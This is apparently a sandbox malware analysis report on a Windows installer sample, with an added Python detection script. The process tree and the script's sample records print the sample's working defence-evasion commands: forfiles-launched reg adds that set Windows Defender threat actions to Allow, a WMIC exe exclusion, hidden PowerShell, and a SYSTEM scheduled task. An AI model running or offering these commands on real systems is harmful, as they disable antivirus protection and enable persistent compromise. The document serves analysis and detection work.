Analysis

  • max time kernel
    167s
  • max time network
    302s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags
    arch:x64 arch:x86 image:win10-20240404-en locale:en-us os:windows10-1703-x64 system
  • submitted
    08/08/2024, 22:34

General

  • Target

    34aff178d21a0542f60d2ae05d69708193f9818cf8834dd77141b8293c2d07cd.exe

  • Size

    7.2MB

  • MD5

    fd9ceab2c4254128dfbee913354685f7

  • SHA1

    31c6c5718e226470787f5d5bc964cd7b8eadc10f

  • SHA256

    34aff178d21a0542f60d2ae05d69708193f9818cf8834dd77141b8293c2d07cd

  • SHA512

    934bbf440bd1d55d0a0dfdf5c7bc1e45b4522cd5107495b99c779c8856470bdf3aa0fa3e41891a4c8fbc93b0736665fa969ad89ee6afc0555f7efb05c73f66bc

  • SSDEEP

    196608:91OFkdXH2JrgNYN+/xFfj2JWjmkU1rlAmXdr:3O2dXGMqNWfjwkU1BAAr

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Runs PowerShell with its display window hidden.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Executes dropped EXE 4 IoCs
  • Indirect Command Execution 1 TTPs 17 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials and other sensitive data.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Drops file in System32 directory 35 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 58 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
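The signatures above describe one chain, visible in the process tree below: forfiles.exe is used as an indirect launcher for cmd.exe, cmd.exe runs reg.exe to write ThreatIDDefaultAction values of 6 (Allow) under the Windows Defender policy key for a list of Defender threat IDs, WMIC adds an "exe" extension exclusion through MSFT_MpPreference, and schtasks re-runs the dropped Install.exe as SYSTEM from the user's Temp directory. The Python below is an added example, not part of the tria.ge report: it runs a rule for each of those behaviours over process-creation records constructed from the command lines in this report. The record shape (PID, parent PID, image, command line) is assumed, as a Sysmon Event ID 1 or Security 4688 log would provide, and the parent PIDs follow the tree's nesting. Action-code names follow the Defender ThreatIdDefaultAction policy, where 6 means Allow.

```python
import re
from dataclasses import dataclass

@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    image: str
    cmdline: str
    @property
    def name(self):
        return self.image.rsplit("\\", 1)[-1].lower()

# Constructed sample (record shape assumed, as in Sysmon Event ID 1 / Security 4688):
# PIDs, images and command lines are copied from this report's process tree and the
# parent PIDs follow its nesting. The last record is a benign control that must not fire.
SAMPLE = [
    Proc(3676, 4792, r"C:\Windows\SysWOW64\forfiles.exe",
         r'forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"'),
    Proc(2064, 3676, r"C:\Windows\SysWOW64\cmd.exe",
         r'/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6'),
    Proc(240, 2064, r"c:\windows\SysWOW64\reg.exe",
         r'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6'),
    Proc(3276, 828, r"C:\Windows\SysWOW64\Wbem\WMIC.exe",
         r'"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True'),
    Proc(2320, 4120, r"C:\Windows\SysWOW64\schtasks.exe",
         r'schtasks /CREATE /TN "bJaUjLwxLUDwMvBjjy" /SC once /ST 22:35:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install.exe\" rv /edidPx 525403 /S" /V1 /F'),
    Proc(3808, 1308, r"C:\Windows\SysWOW64\reg.exe",
         r'REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32'),
    Proc(9001, 1, r"C:\Windows\System32\reg.exe",
         r'reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName'),
]

THREAT_KEY = r"policies\microsoft\windows defender\threats\threatiddefaultaction"
# Action codes of the Defender ThreatIdDefaultAction policy. 6 = Allow: Defender
# stops acting on anything it classifies under that threat ID.
ACTIONS = {1: "Clean", 2: "Quarantine", 3: "Remove", 6: "Allow", 8: "UserDefined", 9: "NoAction", 10: "Block"}
# "/v <id> /t <type> /d <action>", tolerating the \" quoting used inside nested cmd strings.
PAIR = re.compile(r'/v\s+\\?"?(\d+)\\?"?\s+/t\s+\w+\s+/d\s+\\?"?(\d+)', re.I)

def threat_actions(cmdline):
    """All (threat_id, action_code) pairs a reg ADD line writes under ThreatIDDefaultAction."""
    if THREAT_KEY not in cmdline.lower() or not re.search(r"\badd\b", cmdline, re.I):
        return []
    return [(int(t), int(a)) for t, a in PAIR.findall(cmdline)]

def mp_exclusion(cmdline):
    """Exclusion added through the MSFT_MpPreference WMI class, e.g. 'ExclusionExtension=exe'."""
    if not re.search(r"msft_mppreference.*\bcall\s+add\b", cmdline, re.I):
        return None
    m = re.search(r"(exclusion\w*)=(\S+)", cmdline, re.I)
    return f"{m.group(1)}={m.group(2)}" if m else "Add"

def system_task_from_temp(cmdline):
    """(task_name, target) when schtasks /CREATE runs a Temp-resident target as SYSTEM."""
    if not re.search(r"schtasks.*/create", cmdline, re.I):
        return None
    ru = re.search(r'/ru\s+"?(\w+)"?', cmdline, re.I)
    tn = re.search(r'/tn\s+"?([^"\s]+)"?', cmdline, re.I)
    tr = re.search(r'/tr\s+"(.+?)"\s+/', cmdline, re.I)
    if ru and tn and tr and ru.group(1).lower() == "system" and "\\appdata\\local\\temp\\" in tr.group(1).lower():
        return tn.group(1), tr.group(1)
    return None

def forfiles_launches_shell(cmdline):
    """forfiles.exe /c used to start cmd or powershell: the Indirect Command Execution pattern."""
    return bool(re.search(r'/c\s+\\?"?\s*(cmd|powershell)\b', cmdline, re.I))

def ancestry(procs, pid):
    """Image names from pid up to the root of the record set."""
    by_pid = {p.pid: p for p in procs}
    chain = []
    while pid in by_pid and len(chain) < 64:
        chain.append(by_pid[pid].name)
        pid = by_pid[pid].ppid
    return chain

def triage(procs):
    """Run every rule over the records; returns (pid, rule, detail) findings in record order."""
    out = []
    for p in procs:
        for tid, code in threat_actions(p.cmdline):
            out.append((p.pid, "defender_threat_action", f"threat {tid} -> {ACTIONS.get(code, code)}"))
        if (ex := mp_exclusion(p.cmdline)):
            out.append((p.pid, "defender_exclusion", ex))
        if (task := system_task_from_temp(p.cmdline)):
            out.append((p.pid, "system_task_from_temp", f"{task[0]} -> {task[1]}"))
        if p.name == "forfiles.exe" and forfiles_launches_shell(p.cmdline):
            out.append((p.pid, "forfiles_indirect_exec", p.cmdline[:60]))
        chain = ancestry(procs, p.pid)
        if p.name in ("reg.exe", "wmic.exe", "powershell.exe") and "forfiles.exe" in chain[1:]:
            out.append((p.pid, "lolbin_in_ancestry", " <- ".join(chain)))
    return out

def allowed_threat_ids(procs):
    """Threat IDs the records set to Allow (6); hunt for these in Defender's detection history."""
    return {tid for p in procs for tid, code in threat_actions(p.cmdline) if code == 6}

if __name__ == "__main__":
    print(*triage(SAMPLE), sep="\n")
    print("allowed threat IDs:", sorted(allowed_threat_ids(SAMPLE)))
```

Run as a script it prints one finding per rule hit and the set of threat IDs that were set to Allow. On a real host the same regexes apply to Sysmon or 4688 command lines; the allowed-ID set is the thing to check against Defender's detection history and against the live HKLM policy key, since the values persist after the installer exits.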

Processes

  • C:\Users\Admin\AppData\Local\Temp\34aff178d21a0542f60d2ae05d69708193f9818cf8834dd77141b8293c2d07cd.exe
    "C:\Users\Admin\AppData\Local\Temp\34aff178d21a0542f60d2ae05d69708193f9818cf8834dd77141b8293c2d07cd.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3936
    • C:\Users\Admin\AppData\Local\Temp\7zS6987.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3164
      • C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install.exe
        .\Install.exe /qdidWd "525403" /S
        3⤵
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:4120
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4792
          • C:\Windows\SysWOW64\forfiles.exe
            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
            5⤵
            • Indirect Command Execution
            • Suspicious use of WriteProcessMemory
            PID:3676
            • C:\Windows\SysWOW64\cmd.exe
              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:2064
              • \??\c:\windows\SysWOW64\reg.exe
                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                7⤵
                • System Location Discovery: System Language Discovery
                PID:240
          • C:\Windows\SysWOW64\forfiles.exe
            forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
            5⤵
            • Indirect Command Execution
            • Suspicious use of WriteProcessMemory
            PID:4980
            • C:\Windows\SysWOW64\cmd.exe
              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:3288
              • \??\c:\windows\SysWOW64\reg.exe
                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                7⤵
                PID:216
          • C:\Windows\SysWOW64\forfiles.exe
            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
            5⤵
            • Indirect Command Execution
            • Suspicious use of WriteProcessMemory
            PID:4556
            • C:\Windows\SysWOW64\cmd.exe
              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2948
              • \??\c:\windows\SysWOW64\reg.exe
                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                7⤵
                PID:4920
          • C:\Windows\SysWOW64\forfiles.exe
            forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
            5⤵
            • Indirect Command Execution
            • Suspicious use of WriteProcessMemory
            PID:3924
            • C:\Windows\SysWOW64\cmd.exe
              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:164
              • \??\c:\windows\SysWOW64\reg.exe
                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                7⤵
                PID:1244
          • C:\Windows\SysWOW64\forfiles.exe
            forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
            5⤵
            • Indirect Command Execution
            • Suspicious use of WriteProcessMemory
            PID:3668
            • C:\Windows\SysWOW64\cmd.exe
              /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2224
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell start-process -WindowStyle Hidden gpupdate.exe /force
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:4568
                • C:\Windows\SysWOW64\gpupdate.exe
                  "C:\Windows\system32\gpupdate.exe" /force
                  8⤵
                  PID:5012
        • C:\Windows\SysWOW64\forfiles.exe
          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m help.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
          4⤵
          • Indirect Command Execution
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:424
          • C:\Windows\SysWOW64\cmd.exe
            /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:616
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:828
              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of AdjustPrivilegeToken
                PID:3276
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /CREATE /TN "bJaUjLwxLUDwMvBjjy" /SC once /ST 22:35:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install.exe\" rv /edidPx 525403 /S" /V1 /F
          4⤵
          • Drops file in Windows directory
          • Scheduled Task/Job: Scheduled Task
          PID:2320
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4120 -s 924
          4⤵
          • Program crash
          PID:1724
  • C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install.exe
    C:\Users\Admin\AppData\Local\Temp\7zS6B5C.tmp\Install.exe rv /edidPx 525403 /S
    1⤵
    • Executes dropped EXE
    • Drops desktop.ini file(s)
    • Drops file in System32 directory
    • System Location Discovery: System Language Discovery
    • Modifies data under HKEY_USERS
    PID:4012
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
      2⤵
      PID:236
      • C:\Windows\SysWOW64\forfiles.exe
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        3⤵
        • Indirect Command Execution
        PID:4912
        • C:\Windows\SysWOW64\cmd.exe
          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4300
          • \??\c:\windows\SysWOW64\reg.exe
            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
            5⤵
            PID:4940
      • C:\Windows\SysWOW64\forfiles.exe
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        3⤵
        • Indirect Command Execution
        PID:220
        • C:\Windows\SysWOW64\cmd.exe
          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4648
          • \??\c:\windows\SysWOW64\reg.exe
            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
            5⤵
            • System Location Discovery: System Language Discovery
            PID:4868
      • C:\Windows\SysWOW64\forfiles.exe
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        3⤵
        • Indirect Command Execution
        • System Location Discovery: System Language Discovery
        PID:1428
        • C:\Windows\SysWOW64\cmd.exe
          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
          4⤵
          • System Location Discovery: System Language Discovery
          PID:672
          • \??\c:\windows\SysWOW64\reg.exe
            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
            5⤵
            PID:4452
      • C:\Windows\SysWOW64\forfiles.exe
        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        3⤵
        • Indirect Command Execution
        PID:4328
        • C:\Windows\SysWOW64\cmd.exe
          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1108
          • \??\c:\windows\SysWOW64\reg.exe
            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
            5⤵
            PID:4320
      • C:\Windows\SysWOW64\forfiles.exe
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        3⤵
        • Indirect Command Execution
        • System Location Discovery: System Language Discovery
        PID:3944
        • C:\Windows\SysWOW64\cmd.exe
          /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4008
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell start-process -WindowStyle Hidden gpupdate.exe /force
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • System Location Discovery: System Language Discovery
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4308
            • C:\Windows\SysWOW64\gpupdate.exe
              "C:\Windows\system32\gpupdate.exe" /force
              6⤵
              • System Location Discovery: System Language Discovery
              PID:4128
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
      2⤵
      • Drops file in System32 directory
      • System Location Discovery: System Language Discovery
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:216
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1308
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3808
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
        3⤵
        PID:3580
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
        3⤵
        • System Location Discovery: System Language Discovery
        PID:3600
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1376
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
        3⤵
        PID:3700
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1972
